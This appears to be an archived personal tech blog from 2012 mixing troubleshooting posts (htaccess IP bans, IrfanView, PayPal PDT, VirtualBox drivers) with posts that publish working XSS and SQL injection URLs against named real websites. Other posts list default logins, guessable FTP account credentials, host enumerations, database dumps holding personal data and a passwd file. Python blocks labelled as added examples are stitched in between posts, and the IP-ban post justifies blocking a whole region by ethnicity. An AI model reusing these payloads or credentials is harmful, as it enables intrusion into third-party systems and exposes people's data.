Sunday, 30 December 2012

wiki camcom milano - manual from casaleggio associati 2010

Wednesday, 5 December 2012

Ban Asian IP addresses. Ban Chinese spammers with .htaccess

After receiving tons of spam on a few websites I've decided to ban all the APNIC addresses.

Since I've not found anything to ban the whole APNIC range, I've searched for the assigned classes that they manage.
How to ban Chinese spammers.

P.S. I've added a few LACNIC
(last update 2012-11-16)

Download the file here, or just add the content to a .htaccess file, and the spam from Asia should be gone.
Put the .htaccess in the main (or any other) folder of your website.
You can use the same approach to ban any other IPv4 address space.

__________.htaccess____________
#list retrieved from
#http://www.iana.org/assignments/ipv4-address-space/ipv4-address-space.txt

#Banning APNIC
deny from 1.0.0.0/8
deny from 14.0.0.0/8
deny from 27.0.0.0/8
deny from 36.0.0.0/8
deny from 39.0.0.0/8
deny from 42.0.0.0/8
deny from 43.0.0.0/8
deny from 49.0.0.0/8
deny from 58.0.0.0/8
deny from 59.0.0.0/8
deny from 60.0.0.0/8
deny from 61.0.0.0/8
deny from 101.0.0.0/8
deny from 103.0.0.0/8
deny from 106.0.0.0/8
deny from 110.0.0.0/8
deny from 111.0.0.0/8
deny from 112.0.0.0/8
deny from 113.0.0.0/8
deny from 114.0.0.0/8
deny from 115.0.0.0/8
deny from 116.0.0.0/8
deny from 117.0.0.0/8
deny from 118.0.0.0/8
deny from 119.0.0.0/8
deny from 120.0.0.0/8
deny from 121.0.0.0/8
deny from 122.0.0.0/8
deny from 123.0.0.0/8
deny from 124.0.0.0/8
deny from 125.0.0.0/8
deny from 126.0.0.0/8
deny from 133.0.0.0/8
deny from 150.0.0.0/8
deny from 153.0.0.0/8
deny from 163.0.0.0/8
deny from 171.0.0.0/8
deny from 175.0.0.0/8
deny from 180.0.0.0/8
deny from 182.0.0.0/8
deny from 183.0.0.0/8
deny from 202.0.0.0/8
deny from 203.0.0.0/8
deny from 210.0.0.0/8
deny from 211.0.0.0/8
deny from 218.0.0.0/8
deny from 219.0.0.0/8
deny from 220.0.0.0/8
deny from 221.0.0.0/8
deny from 222.0.0.0/8
deny from 223.0.0.0/8
__________end of .htaccess____________

Don't do it if you have content that should be available to Asian visitors.
I'm not racist, but the content of my website is not intended for Asian people, and any Asian person can understand that I'm just cutting down the spam on websites whose content is not supposed to be read by non-EU persons.

You can also redirect those visitors to other pages (e.g. a form).
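Before deploying a list like the one above it is worth dry-running it against your own access log: the /8 blocks IANA assigned to APNIC cover the whole Asia-Pacific region, not only China, so the list also blocks legitimate visitors, and on Apache 2.4 the `deny from` syntax needs mod_access_compat (the native form is `Require not ip`). The following script is an added example, not part of the original post: it parses `deny from` lines with the standard-library ipaddress module, reports which client IPs in a constructed sample log would be blocked, and renders the same list in Apache 2.4 syntax. DENY_LIST is a subset of the post's list and SAMPLE_LOG is constructed.

```python
"""Dry-run an Apache 2.2 'deny from' list against access-log entries.

Added example (not part of the original post): parses 'deny from' lines,
reports which client IPs in a constructed sample log would be blocked, and
renders the same list in the Apache 2.4 'Require' syntax.
"""
import ipaddress
import re

# A subset of the post's list; the full .htaccess parses the same way.
DENY_LIST = """\
#Banning APNIC
deny from 1.0.0.0/8
deny from 14.0.0.0/8
deny from 27.0.0.0/8
deny from 202.0.0.0/8
deny from 203.0.0.0/8
"""

# Constructed sample access log (Apache combined format). 203.0.113.0/24,
# 192.0.2.0/24 and 198.51.100.0/24 are RFC 5737 documentation ranges;
# 1.2.3.4 is simply an address inside 1.0.0.0/8.
SAMPLE_LOG = """\
1.2.3.4 - - [05/Dec/2012:10:00:01 +0100] "POST /comment.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Dec/2012:10:00:02 +0100] "POST /comment.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.10 - - [05/Dec/2012:10:00:03 +0100] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.5 - - [05/Dec/2012:10:00:04 +0100] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

DENY_RE = re.compile(r"^\s*deny\s+from\s+(\S+)\s*$", re.IGNORECASE)


def parse_deny_list(text):
    """Return the networks named by 'deny from' lines; comments and blanks are skipped."""
    nets = []
    for line in text.splitlines():
        m = DENY_RE.match(line)
        if m:
            nets.append(ipaddress.ip_network(m.group(1), strict=False))
    return nets


def is_denied(ip, nets):
    """True when the address falls inside any denied network."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in nets)


def classify_log(log_text, nets):
    """Map each client IP (first field of a combined-format line) to True if it would be denied."""
    verdict = {}
    for line in log_text.splitlines():
        if line.strip():
            ip = line.split(" ", 1)[0]
            verdict[ip] = is_denied(ip, nets)
    return verdict


def to_apache24(nets):
    """Render the same list in Apache 2.4 mod_authz_host syntax (no mod_access_compat needed)."""
    lines = ["<RequireAll>", "    Require all granted"]
    lines += [f"    Require not ip {net}" for net in nets]
    lines.append("</RequireAll>")
    return "\n".join(lines)


if __name__ == "__main__":
    nets = parse_deny_list(DENY_LIST)
    for ip, denied in classify_log(SAMPLE_LOG, nets).items():
        print(f"{ip:<16} {'DENY' if denied else 'allow'}")
    print(to_apache24(nets))
```

Feed it your real .htaccess and a day of access logs (swap the two constants for file reads) and look at the share of requests that would be denied before enabling the list; if your own office or monitoring addresses show up as DENY, add an explicit allow for them.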

Saturday, 20 October 2012

[Solved] Irfanview "disk is full" error

While using the batch processing of IrfanView you can encounter this error: "disk is full".
The error happens when you have set it to overwrite the previous files (advanced conversion settings) and they are *locked*.
Check that the file can be written by your Windows user, that the file is not read-only, and that the file is not locked by another process.


______________________Remove read only____________________
Right-click on the file.
Click on Properties.
Click on the General tab, clear the Read-only check box, and then click OK (confirm also to apply to all the subfolders).
___________________________________
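When a batch run touches hundreds of files, clicking through Properties for each one does not scale. The script below is an added example, not part of the original post or of IrfanView: it walks a folder, lists every file whose owner-write bit is clear (on Windows that bit is the Read-only attribute), and clears the flag. It checks the mode bits rather than os.access(), so the answer is the same whether or not you run it as administrator or root; the demo() function builds a constructed temporary tree so it runs stand-alone.

```python
"""Find and clear the read-only flag on files under a folder.

Added example, not part of the original post or of IrfanView. The owner-write
bit of st_mode is the Windows Read-only attribute, so the same check works on
Windows and on Unix-like systems.
"""
import os
import stat
import tempfile


def is_read_only(path):
    """True when the owner-write bit is clear (Windows: Read-only attribute set)."""
    return not (os.stat(path).st_mode & stat.S_IWUSR)


def find_read_only(root):
    """Return all read-only regular files below root, sorted."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.isfile(path) and is_read_only(path):
                hits.append(path)
    return sorted(hits)


def clear_read_only(root):
    """Set the owner-write bit on every read-only file below root; return how many changed."""
    changed = 0
    for path in find_read_only(root):
        os.chmod(path, os.stat(path).st_mode | stat.S_IWUSR)
        changed += 1
    return changed


def demo():
    """Run on a constructed temporary tree; returns (read-only count before, after)."""
    with tempfile.TemporaryDirectory() as tmp:
        batch = os.path.join(tmp, "batch")
        os.makedirs(batch)
        locked = os.path.join(batch, "img001.jpg")
        free = os.path.join(batch, "img002.jpg")
        for path in (locked, free):
            with open(path, "wb") as fh:
                fh.write(b"constructed image bytes")
        # Make one file read-only, as the batch conversion would find it.
        os.chmod(locked, stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH)
        before = len(find_read_only(tmp))
        clear_read_only(tmp)
        after = len(find_read_only(tmp))
    return before, after


if __name__ == "__main__":
    print(demo())
```

Run find_read_only() first and review the list; clear_read_only() only changes files that were read-only, and it does nothing about files held open by another process, which still need that process closed.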

Thursday, 11 October 2012

AMD PCNET Family PCI Ethernet Adapter - Windows XP, 2003 Drivers




It can happen that you cannot find the drivers (AMD PCNET Family PCI Ethernet Adapter - not installed) for the Ethernet (NIC) adapter that VirtualBox uses.

PCI\VEN_1022&DEV_2000&SUBSYS_20001022&REV_40\3&267A616A&0&18

I've also found this link https://www.virtualbox.org/ticket/3411 but I was unable to find a working download.


Since the links to the AMD websites are failing and it seems that the drivers cannot be found on the website, I'm adding a new link.


Here you can download the AMD PCNET drivers for VirtualBox

They have been tested with Windows XP 32-bit and VirtualBox 4.2.0 r80737.
After a while I've also tested them with Windows 7 Pro 32-bit (a slim version) and they work.
They also work on Windows 2003 R2 (thanks to David Acosta).


If you have a direct link to the AMD website or any other good information just add it in the comments.

Tuesday, 17 April 2012

http://www.hstl.crhst.cnrs.fr | XSS

http://www.hstl.crhst.cnrs.fr/i-corpus/histmap/informations/bollettino.php?lang=en%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E%3C%22

vanthuanobservatory | sql injection

SQL Injection
http://www.vanthuanobservatory.org/bollettini-dsc/bollettino.php?lang=en

http://www.mnitalia.com | php local file inclusion, privileges escalation, system compromise

sample page
http://www.mnitalia.com/home/index.php?page=page.php&cat=webmarketing

http://www.mnitalia.com/home/index.php?page={file inclusion here}&cat=*

primomaggio.com | XSS

POST
http://www.primomaggio.com/newsletter.php

POSTDATA
nome=chick&cognome=chick&email=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3Echick%40mailinator.com&x=40&y=7&send=1

_____
An SQL injection was available in the login area of the forum of the previous website (in ASP, as far as I can remember).

http://infopoint.atac.roma.it | xss

http://infopoint.atac.roma.it/bw.asp?lingua=ita%22%3E%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E%3Cscript%20src=%22

http://www.micron.com | XSS

http://www.micron.com/search?q=%3Cscript%3Ealert%28document.cookie%29%3b%3C%2fscript%3E
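Two of the defect classes listed above recur in the entries: a `lang` parameter echoed unescaped into the page (hstl.crhst.cnrs.fr, infopoint.atac.roma.it) and a `page` parameter used to pick a file to include (mnitalia.com). The block below is an added example, not code from any of those sites: it shows each vulnerable pattern beside its fix with plain functions rather than a web framework. ALLOWED_LANGS, PAGES and FAKE_FS are constructed stand-ins for a language list and a template directory.

```python
"""Reflected XSS and file inclusion: the vulnerable pattern beside its fix.

Added example, not code from any site listed above. FAKE_FS stands in for a
filesystem and PAGES is the registry of pages that may be included.
"""
import html
import posixpath

ALLOWED_LANGS = {"en", "it"}

# Constructed in-memory "filesystem": two templates and one file that must
# never be served to a client.
FAKE_FS = {
    "templates/page.html": "<p>page</p>",
    "templates/news.html": "<p>news</p>",
    "config.inc": "db_password=constructed",
}
# Page registry: the only values of 'page' that resolve to a file.
PAGES = {"page.php": "templates/page.html", "news.php": "templates/news.html"}


def render_lang_vulnerable(lang):
    """Echoes the parameter verbatim into an attribute: the pattern behind the lang= entries above."""
    return f'<html lang="{lang}"><body>...</body></html>'


def render_lang_fixed(lang):
    """Allowlist the value, then escape it anyway so the output stays safe if the allowlist grows."""
    if lang not in ALLOWED_LANGS:
        lang = "en"
    return f'<html lang="{html.escape(lang, quote=True)}"><body>...</body></html>'


def include_page_vulnerable(page):
    """Builds a path from user input, so any file the process can read is reachable."""
    path = posixpath.normpath(posixpath.join("templates", page))
    return FAKE_FS.get(path)


def include_page_fixed(page):
    """Treats 'page' as a key into a fixed map, never as a path."""
    target = PAGES.get(page)
    if target is None:
        raise ValueError("unknown page")
    return FAKE_FS[target]
```

The fixed versions apply the same rule in both cases: a request parameter selects among values the application already knows, and it is never spliced into markup or a path as-is. Output escaping is kept even behind the allowlist because the two controls fail independently.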

Thursday, 15 March 2012

Paypal PDT/IPN - HTTP Error 302

PayPal PDT/IPN - HTTP status error 302 happens when you are contacting PayPal via plain HTTP while (as far as I can understand) they have enforced requests to be made via SSL (443, https) rather than plain HTTP (80).
It happens in both sandbox and live.

Paypal PDT error 4003 problem

The PayPal error 4003 (when receiving PDT) can happen when the server is making too many requests/validations for the same "tx" (transaction id) with cmd=_notify-synch. PayPal will not send back the data after about 5 requests.

Sometimes the error can happen randomly in the sandbox. This shouldn't happen in "live".

Paypal merchant_return_link problem

merchant_return_link=click+here
merchant_return_link=return+to+merchant
merchant_return_link=*



It could happen if:
the client browser clicks the button without accepting/using/respecting the META tag redirection
auto return is set to off in the merchant account

A URL rewrite could be a solution.
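The two PDT errors above have the same shape of fix: always talk to the endpoint over HTTPS, and validate each `tx` once instead of on every page load. The helper below is an added example, not PayPal's code. It assumes the PDT exchange as documented at the time, a POST of `cmd=_notify-synch`, `tx` and `at` (the identity token) to https://www.paypal.com/cgi-bin/webscr, answered by a body whose first line is `SUCCESS` or `FAIL` followed by URL-encoded `key=value` lines. The transport is injected so the example runs offline against a constructed response (SAMPLE_RESPONSE, fake_post).

```python
"""PDT validation helper: HTTPS only, and each transaction id is queried once.

Added example, not PayPal's code. Assumes the documented PDT exchange:
POST cmd=_notify-synch&tx=<id>&at=<identity token>, response body
'SUCCESS' or 'FAIL' on the first line then URL-encoded key=value lines.
"""
import urllib.parse
import urllib.request

# Plain http:// here is what produces the 302 described above.
PDT_ENDPOINT = "https://www.paypal.com/cgi-bin/webscr"


def parse_pdt_response(body):
    """Return (ok, fields) from a PDT response body."""
    lines = body.strip().splitlines()
    if not lines:
        return False, {}
    fields = {}
    for line in lines[1:]:
        if "=" in line:
            key, value = line.split("=", 1)
            fields[urllib.parse.unquote_plus(key)] = urllib.parse.unquote_plus(value)
    return lines[0].strip() == "SUCCESS", fields


def https_post(url, data):
    """Real transport: POST form data over HTTPS and return the body as text."""
    if not url.startswith("https://"):
        raise ValueError("PDT requests must use https")
    req = urllib.request.Request(url, data=urllib.parse.urlencode(data).encode())
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode()


class PdtValidator:
    """Validates PDT transactions and remembers successes so a tx is never re-queried."""

    def __init__(self, identity_token, post=https_post, endpoint=PDT_ENDPOINT):
        self.token = identity_token
        self.post = post
        self.endpoint = endpoint
        self.calls = 0       # how many times PayPal was actually contacted
        self._cache = {}     # tx -> (True, fields); persist this (DB) in real use

    def validate(self, tx):
        if tx in self._cache:
            return self._cache[tx]
        self.calls += 1
        body = self.post(self.endpoint, {"cmd": "_notify-synch", "tx": tx, "at": self.token})
        ok, fields = parse_pdt_response(body)
        if ok:                      # only successes are cached; FAIL may be transient
            self._cache[tx] = (ok, fields)
        return ok, fields


# Constructed response in the documented format (values are made up).
SAMPLE_RESPONSE = """SUCCESS
mc_gross=19.95
payment_status=Completed
first_name=Mario
last_name=Rossi
item_name=Test+item
txn_id=CONSTRUCTED-TX-1
"""


def fake_post(url, data):
    """Offline stand-in for https_post that answers one constructed tx."""
    if not url.startswith("https://"):
        raise ValueError("PDT requests must use https")
    return SAMPLE_RESPONSE if data["tx"] == "CONSTRUCTED-TX-1" else "FAIL\n"


if __name__ == "__main__":
    validator = PdtValidator("constructed-identity-token", post=fake_post)
    for _ in range(6):              # six page loads, one request to PayPal
        ok, fields = validator.validate("CONSTRUCTED-TX-1")
    print(ok, fields["payment_status"], fields["item_name"], "calls:", validator.calls)
```

The return page then reads the cached result on every reload instead of repeating the `_notify-synch` call, which is what keeps the per-tx request count under the limit mentioned above; in production the cache belongs in the order database rather than in memory.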

Thursday, 16 February 2012

ior.it | default account???

http://www.ior.it/RegMed/Web/Login.aspx
user: RegMed


 pass: pippero
user: admin
pass: colon

 --------------------------------
It's possible  to change the password of any user by knowing only the username (????).

Saturday, 11 February 2012

antiproibizionisti.it | Sql injections, data leak, system compromise

Since the website has been closed (I'm sorry for that).


Some (old) information.


***Remember that I've never abused any website, modified anything or used confidential data.***


http://www.antiproibizionisti.it/ricerca.asp?page=1&trova=(%20Advid%20)';%20trunca

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][Driver ODBC Microsoft Access] Errore di sintassi (operatore mancante) nell'espressione della query



/inc_ricerca.htm, line 12



--------------
http://antiproibizionisti.it/archivio_sdf.asp?f=1'0

http://antiproibizionisti.it/display_gessa.asp?f=3629&u='9
http://antiproibizionisti.it/archivio_gessa.asp?f='9

http://antiproibizionisti.it/display.asp?f=4177&u=10

http://antiproibizionisti.it/archivio_sdf.asp?f=10%20union%20select%20sum(nome),1,2,3,6,4,4,5%20from%20user
http://antiproibizionisti.it/archivio_sdf.asp?f=10%20UNION%20SELECT%20id,%20name,%20'','','','','',''%20FROM%20user


http://antiproibizionisti.it/archivio_sdf.asp?f=10%20union%20select%201,1,1,1%20from%20user%20where%20%20id=1




http://antiproibizionisti.it/display.asp?f=4177&u=1%20union%20select%20id,nome,cognome,pass,1,1,1,1%20from%20user
http://antiproibizionisti.it/display_sdf.asp?f=4840&u=10



ID
IDutente

-----
Readable files
/inc_archiviofilo_sdf.htm
/inc_ricerca.htm

existing files that are not available from the web
modifica.asp
pass.asp
mail.asp
news.asp
delnews.asp
editnews.asp


database
mdb-database/notizie.mdb


GET /admin/delnews.asp HTTP/1.1
Host: antiproibizionisti.it


-----------------------------------------------------


parts of the DB SCHEMA


-news
->titolo
->testo
->titoletto
->data

-user  --- 8 columns
->ID
->nome
->cognome
->pass


-filodiretto
->IDutente
->risposta
->data_dom

askyp.com | sql data dump, data leak

Too much data to dump. Anyway I've deleted everything (here ... ).
--- samples ---

CREATE TABLE company_address (
  company_id bigint(3) NOT NULL auto_increment,
  company_name varchar(200) NOT NULL default '',
  address longtext,
  street_id bigint(3) default NULL,
  city_id bigint(3) default NULL,
  state_id bigint(3) default NULL,
  zip varchar(20) default NULL,
  phone varchar(20) NOT NULL default '0',
  fax varchar(20) default NULL,
  email varchar(100) default NULL,
  category char(1) NOT NULL default '',
  PRIMARY KEY  (company_id)
);

INSERT INTO company_address VALUES("1", "M & A Hispanic Book Store", "1902 Bergenline Ave", "0", "16284", "30", "07087", "(201) 866-0010", "", "", "0");

------------------------------------------

64.233.183.104 (??? google ???) | sql data dump, data leak

I've found this data time ago...

CREATE TABLE partners (
  id int(11) NOT NULL auto_increment,
  email varchar(255) NOT NULL default '',
  phone varchar(50) default NULL,
  fax varchar(50) default NULL,
  address varchar(255) default NULL,
  zip varchar(20) default NULL,
  city varchar(50) default NULL,
  state varchar(50) default NULL,
  country varchar(50) default NULL,
  first_name varchar(100) default NULL,
  last_name varchar(100) default NULL,
  company_name varchar(100) default NULL,
  login varchar(25) NOT NULL default '',
  password varchar(25) NOT NULL default '',
  additional_data text,
  ku_balance float(16,2) unsigned NOT NULL default '0.00',
  us_balance float(16,2) unsigned NOT NULL default '0.00',
  credit_limit float(10,2) default '0.00',
  status enum('unconfirmed','active','suspended','free') default 'unconfirmed',
  promo varchar(100) default NULL,
  partner_group varchar(40) default NULL,
  date datetime default NULL,
  discount_id int(11) NOT NULL default '0',
  level int(3) default '0',
  new_ip_page enum('0','1') default NULL,
  PRIMARY KEY  (id)
) TYPE=MyISAM;


INSERT INTO partners VALUES (35,'farlep@
********.com','+38(048)**************','+38(048)*******','Gukovskogo........
etc etc <data_var website_name>yuriy</data_var website_name><data_var website_url>yuriy</data_var website_url><data_var description>yuriy</data_var description><data_var visitors> .... etc etc

(I've added the asterisks)
I don't know whether the server is related to Google; anyway, the partners are
AT @ -> scmholding.com, apexhost.com, kemford.com, instasites.net, geoffcweb.com, etc etc

Who knows ...

nursery-info.net | Sql injection, data leak (sql dumps), system compromise

the website is dead so ... I can publish something

The main table

CREATE TABLE nurseryinfo (
   Title text,
   Initial text,
   First_Name text,
   Surname text,
   Contact_Name text,
   Position text,
   Nursery text,
   Address text,
   Address1 text,
   Town text,
   County text,
   Postcode text,
   Tel_No text,
   No_0_2 text,
   Range text,
   Weekly text,
   Tot_Staff text,
   Group_No text,
   Facility text,
   Member_No text,
   Branch text,
   Region text,
   Officer_Br text,
   Officer_Re text,
   Officer_Ex text,
   Year_Joined text,
   Eig text,
   Contact text,
   Task_Group text,
   _998 text,
   No_of_Nurs text,
   So text,
   Fax_No text,
   Renewed text,
   Bulletin text,
   E_Mail text,
   Mem_Type text,
   Fees_Paid text,
   Paid text,
   Month_Join text,
   Membership text,
   NDNA text,
   Chair text,
   Regional_R text,
   Chairtel_N text,
   Rep_Tel_No text,
   Ass text,
   Primary_ text,
   Add_site text,
   Head_offic text,
   No_2_3 int(11),
   No_3_5 int(11),
   No_5 int(11),
   Reg_Authty text,
   Qual_Staff int(11),
   Anc_Staff int(11),
   Year_Est_S int(11),
   Voting text,
   Joined_200 text,
   DW_Area text,
   Expires text,
   Notes text,
   Network text,
   Char_Don text,
   Date_Dontd text,
   Registered text,
   Accounts_2 text,
   Reg_Accs_2 text,
   QualityControl text
);

meridiana.it | SQL Injection

Since the injections were fixed some time ago ... I'm just publishing some samples (nothing confidential).

Sample error
[TCX][MyODBC]You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY N1 ASC, ID_Head DESC' at line 1

/ita/web/index.asp, line 15


db: Sql39909_2
sample table -> clienti
columns -> cliente, indirizzo, data, telefono

sample injection
http://www.meridianaitalia.it/ita/web/index.asp?id_menu=3%20UNION%20Select%20*%20from%20Sql39909_2.clienti/*&menu=Newa

Monday, 6 February 2012

old unisannio.it hosts (2003/2004?)

ns.unisannio.it
mail.unisannio.it
www.unisannio.it
ftp.unisannio.it
nosferatu.unisannio.it
medusa.unisannio.it
hydra.ing.unisannio.it
proxy.unisannio.it
webmail.unisannio.it
gw-0.unisannio.it
wwwsci.unisannio.it
wwwlavoro.unisannio.it
wwwdases.unisannio.it
wwwdsga.unisannio.it
wwwdsba.unisannio.it
wwwstat.unisannio.it
wwwsea.unisannio.it
wwwding.unisannio.it
web.ing.unisannio.it
virgilio.ing.unisannio.it
wheel.ing.unisannio.it
caudina.ing.unisannio.it
serg.ing.unisannio.it
russo.ing.unisannio.it
contabile.ing.unisannio.it
opac.ing.unisannio.it
sgr.ing.unisannio.it
serglink.ing.unisannio.it
ponza.ing.unisannio.it
deal.ing.unisannio.it
gvp.ing.unisannio.it
contabile.ing.unisannio.it
canfora.ing.unisannio.it
paradise.ing.unisannio.it
lisus1.ing.unisannio.it
lisus2.ing.unisannio.it
lisus3.ing.unisannio.it
leus.ing.unisannio.it
leus-ws1.ing.unisannio.it
leus-ws2.ing.unisannio.it
lesim1.ing.unisannio.it
lesim2.ing.unisannio.it
lesim3.ing.unisannio.it
lesim4.ing.unisannio.it
disanto.ing.unisannio.it
francof.ing.unisannio.it
gw-64.ing.unisannio.it
h97.ing.unisannio.it
golem.ing.unisannio.it
thewavesgroup.ing.unisannio.it
cem.ing.unisannio.it
paradise-np.ing.unisannio.it
continillo.ing.unisannio.it
h103.ing.unisannio.it
h104.ing.unisannio.it
h105.ing.unisannio.it
h106.ing.unisannio.it
h107.ing.unisannio.it
h108.ing.unisannio.it
h109.ing.unisannio.it
h110.ing.unisannio.it
feanor.ing.unisannio.it
h112.ing.unisannio.it
h113.ing.unisannio.it
h114.ing.unisannio.it
h115.ing.unisannio.it
h116.ing.unisannio.it
h117.ing.unisannio.it
h118.ing.unisannio.it
h119.ing.unisannio.it
h120.ing.unisannio.it
h121.ing.unisannio.it
h122.ing.unisannio.it
videoconf.ing.unisannio.it
h124.ing.unisannio.it
h125.ing.unisannio.it
gw-96.ing.unisannio.it
ns.rcost.unisannio.it
www.rcost.unisannio.it
h03.rcost.unisannio.it
h04.rcost.unisannio.it
h05.rcost.unisannio.it
h06.rcost.unisannio.it
h07.rcost.unisannio.it
h08.rcost.unisannio.it
h09.rcost.unisannio.it
h10.rcost.unisannio.it
h11.rcost.unisannio.it
h12.rcost.unisannio.it
h13.rcost.unisannio.it
h14.rcost.unisannio.it
h15.rcost.unisannio.it
h16.rcost.unisannio.it
h17.rcost.unisannio.it
h18.rcost.unisannio.it
h19.rcost.unisannio.it
h20.rcost.unisannio.it
h21.rcost.unisannio.it
h22.rcost.unisannio.it
h23.rcost.unisannio.it
h24.rcost.unisannio.it
h25.rcost.unisannio.it
h26.rcost.unisannio.it
h27.rcost.unisannio.it
h28.rcost.unisannio.it
nat.rcost.unisannio.it
gw.rcost.unisannio.it
bosco-gw.unisannio.it
boscobri-gw.unisannio.it
hicom-gw.unisannio.it
ceda-backup-gw.unisannio.it
dialup.unisannio.it
calandra-gw.unisannio.it
guerrazzi1-gw.unisannio.it
guerrazzi0-gw.unisannio.it
mulini-gw.unisannio.it
calandra0-gw.unisannio.it
calandra1-gw.unisannio.it
battistine-gw.unisannio.it
unisannio-gw.unisannio.it

old joe accounts of free websites

----ftp.tripod.it----
ftp.tripod.it:21  U: angelo  P: angelo
ftp.tripod.it:21  U: apostolo  P: apostolo
ftp.tripod.it:21  U: arny  P: arny
ftp.tripod.it:21  U: basa  P: basa
ftp.tripod.it:21  U: bedford  P: bedford
ftp.tripod.it:21  U: bonnin  P: bonnin
ftp.tripod.it:21  U: bubak  P: bubak
ftp.tripod.it:21  U: bucky  P: bucky
ftp.tripod.it:21  U: carlton  P: carlton
ftp.tripod.it:21  U: cora  P: cora
ftp.tripod.it:21  U: cozzi  P: cozzi
ftp.tripod.it:21  U: derby  P: derby
ftp.tripod.it:21  U: elin  P: elin
ftp.tripod.it:21  U: emr  P: emr
ftp.tripod.it:21  U: evelina  P: evelina
ftp.tripod.it:21  U: evita  P: evita
ftp.tripod.it:21  U: fania  P: fania
ftp.tripod.it:21  U: fara  P: fara
ftp.tripod.it:21  U: federico  P: federico
ftp.tripod.it:21  U: ferdy  P: ferdy
ftp.tripod.it:21  U: fisher  P: fisher
ftp.tripod.it:21  U: francine  P: francine
ftp.tripod.it:21  U: gareth  P: gareth
ftp.tripod.it:21  U: gonzalez  P: gonzalez
ftp.tripod.it:21  U: gussy  P: gussy
ftp.tripod.it:21  U: hakan  P: hakan
ftp.tripod.it:21  U: jeanette  P: jeanette
ftp.tripod.it:21  U: jeremy  P: jeremy
ftp.tripod.it:21  U: josephs  P: josephs
ftp.tripod.it:21  U: kassie  P: kassie
ftp.tripod.it:21  U: kinch  P: kinch
ftp.tripod.it:21  U: lac  P: lac
ftp.tripod.it:21  U: las  P: las
ftp.tripod.it:21  U: leni  P: leni
ftp.tripod.it:21  U: leone  P: leone
ftp.tripod.it:21  U: luu  P: luu
ftp.tripod.it:21  U: lynn  P: lynn
ftp.tripod.it:21  U: mado  P: mado
ftp.tripod.it:21  U: marino  P: marino
ftp.tripod.it:21  U: mathieu  P: mathieu
ftp.tripod.it:21  U: maureen  P: maureen
ftp.tripod.it:21  U: medel  P: medel
ftp.tripod.it:21  U: miceli  P: miceli
ftp.tripod.it:21  U: milor  P: milor
ftp.tripod.it:21  U: minority  P: minority
ftp.tripod.it:21  U: mischa  P: mischa
ftp.tripod.it:21  U: niki  P: niki
ftp.tripod.it:21  U: polla  P: polla
ftp.tripod.it:21  U: scorpio  P: scorpio
ftp.tripod.it:21  U: sforza  P: sforza
ftp.tripod.it:21  U: siva  P: siva
ftp.tripod.it:21  U: soin  P: soin
ftp.tripod.it:21  U: sosa  P: sosa
ftp.tripod.it:21  U: souther  P: souther
ftp.tripod.it:21  U: starlet  P: starlet
ftp.tripod.it:21  U: tedi  P: tedi
ftp.tripod.it:21  U: toba  P: toba
ftp.tripod.it:21  U: tommaso  P: tommaso
ftp.tripod.it:21  U: wan  P: wan
ftp.tripod.it:21  U: wilfred  P: wilfred
ftp.tripod.it:21  U: winni  P: winni
ftp.tripod.it:21  U: yun  P: yun


----mail.freemail.it----
ahmed
alasdair
alison
allegra
allis
alwin
amalia
amelia
andriana
annetta
antony
arto
astrix
austen
azar
beck
belk
benson
bertha
berti
bice
bina
blau
bogart
brad
bradley
britney
brothers
bruno
burnaby
burt
cameron
carola
castro
caty
cecilia
celle
cesare
chaya
chev
cicero
circe
class
clemmie
colly
connie
consulta
cora
correa
creative
cris
curcio
cupido
dada
dale
darla
deana
dede
deluca
desi
diamond
domenico
domingo
dora
econ
edwin
elisabet
elsa
elvira
enrica
ernesto
erwin
este
faisal
faustina
fearless
felicio
fergus
fina
fishman
flint
florinda
foley
follett
franky
fuller
galvin
gare
gass
ge
genia
gerardo
gibbons
giusto
goldberg
goldie
grego
guglielm
guillaum
gurley
harley
hector
helena
henri
hine
honey
hoover
iago
ileana
isabell
jackson
jann
joann
joanne
johny
joseph
kally
kara
karil
karin
kari
karol
katina
keep
kendall
keynes
kilian
krull
kyrie
larry
laser
lavina
leander
levi
leyton
lizzy
louise
luciano
lucio
lodovico
luis
lunk
luther
makoto
marano
marcos
mariam
mariotti
marks
marlo
marve
marven
masini
massone
mateo
matilde
maurino
mcmanus
melinda
mella
melody
milo
minnie
mmail
modestos
moja
momon
moses
myer
myrah
nancy
networks
newport
nichole
nikola
ninetta
ninno
ninja
noname
norberto
norma
oded
ophelia
opus
orca
orsola
page
palermo
pancho
para
paulette
pepi
pepe
philip
picard
pietro
pooh
prisca
priya
quintina
rachmani
rami
ramona
rana
reader
rebecca
reis
renate
renny
rizzo
roland
rossy
ruby
rufino
russel
rusty
sabina
salim
sanchez
santiago
satin
scottie
seka
selena
sergei
shaker
shana
shiva
shlomo
siva
sonni
sousa
spencer
stephi
student
sunil
susanna
susanne
sutter
sylvia
talbot
tara
temp
thom
tigger
tim
timothy
tony
tosca
trent
tripp
tropea
tuan
tuckie
ully
ulrich
valma
verde
waters
willie
witold
yousef



NOTE: Those websites/hosts/servers were shut down a long time ago. This is why I'm publishing such information.

Old accounts, dead websites, old passwd

www.dmyouhak.com:21  U/P: ynws
www.dmyouhak.com:21  U/P: daeil24
---------------------------------------

-------shell4.unixshells.de-------
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
